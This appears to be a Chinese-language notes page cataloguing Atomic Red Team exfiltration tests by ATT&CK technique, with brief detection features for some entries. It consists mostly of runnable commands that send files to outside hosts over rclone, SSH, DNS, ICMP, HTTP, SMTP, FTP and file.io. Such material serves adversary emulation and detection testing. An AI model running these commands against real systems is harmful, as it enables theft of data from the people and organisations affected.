Atomic-渗漏（Exfiltration）

T1567.002

Exfiltration Over Web Service: Exfiltration to Cloud Storage

T1048

Exfiltration Over Alternative Protocol

T1048.003

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

T1048.002

Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

T1041

Exfiltration Over C2 Channel

T1030

Data Transfer Size Limits

T1020

Automated Exfiltration

1567.002

Exfiltrate data with rclone to cloud Storage - Mega (Windows)

• Atomic Test #1 - Exfiltrate data with rclone to cloud Storage - Mega (Windows)

New-Item #{rclone_config_path}\rclone -ItemType directory
New-Item #{rclone_config_path}\rclone\rclone.conf
cd #{rclone_path}
.\rclone.exe config create #{remote_share} mega
set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"
.\rclone.exe copy --max-size 1700k #{dir_to_copy} #{remote_share}:test -v

提取特征：rclone. exe

T1048

Exfiltration Over Alternative Protocol

• Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH
• Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH
• Atomic Test #3 - DNSExfiltration (doh)

Exfiltration Over Alternative Protocol - SSH

ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

Exfiltration Over Alternative Protocol - SSH

tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'

DNSExfiltration (doh)

Import-Module #{ps_module}
Invoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}

提取特征：Invoke-DNSExfiltrator

T1048.003

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

• Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP
• Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP
• Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS
• Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP
• Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP
• Atomic Test #6 - MAZE FTP Upload
• Atomic Test #7 - Exfiltration Over Alternative Protocol - FTP - Rclone
• Atomic Test #8 - Python3 http.server

Exfiltration Over Alternative Protocol - HTTP

#### Run it with these steps!

1. Victim System Configuration:
    
    mkdir /tmp/victim-staging-area echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
    
2. Using Python to establish a one-line HTTP server on victim system:
    
    cd /tmp/victim-staging-area python -m SimpleHTTPServer 1337
    
3. To retrieve the data from an adversary system:
    
    wget http://VICTIM_IP:1337/victim-file.txt

Exfiltration Over Alternative Protocol - ICMP

$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }

Exfiltration Over Alternative Protocol - DNS

#### Run it with these steps!

1. On the adversary machine run the below command.
    
    tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
    
2. On the victim machine run the below commands.
    
    xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
    
3. Once the data is received, use the below command to recover the data.
    
    cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r

Exfiltration Over Alternative Protocol - HTTP

$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content

Exfiltration Over Alternative Protocol - SMTP

Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}

MAZE FTP Upload

$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://#{ftp_server}/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
{foreach($file in (dir $Dir_to_copy "*.7z"))
{echo "Uploading $file..."
$uri = New-Object System.Uri($ftp+$file.name)
$web_client.UploadFile($uri, $file.FullName)}}
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}

Exfiltration Over Alternative Protocol - FTP - Rclone

$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate

Python3 http. server

if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi

T1048.002

Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

• Atomic Test #1 - Exfiltrate data HTTPS using curl windows
• Atomic Test #2 - Exfiltrate data HTTPS using curl linux

Exfiltrate data HTTPS using curl windows

#{curl_path} -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/

Exfiltrate data HTTPS using curl linux

curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/

T1041

Exfiltration Over C2 Channel

• Atomic Test #1 - C2 Data Exfiltration

C2 Data Exfiltration

if(-not (Test-Path #{filepath})){ 
  1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive

T1030

Data Transfer Size Limits

• Atomic Test #1 - Data Transfer Size Limits

Data Transfer Size Limits

cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}

T1020

Automated Exfiltration

• Atomic Test #1 - IcedID Botnet HTTP PUT

IcedID Botnet HTTP PUT

$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}

迷茫的人生，需要不断努力，才能看清远方模糊的志向！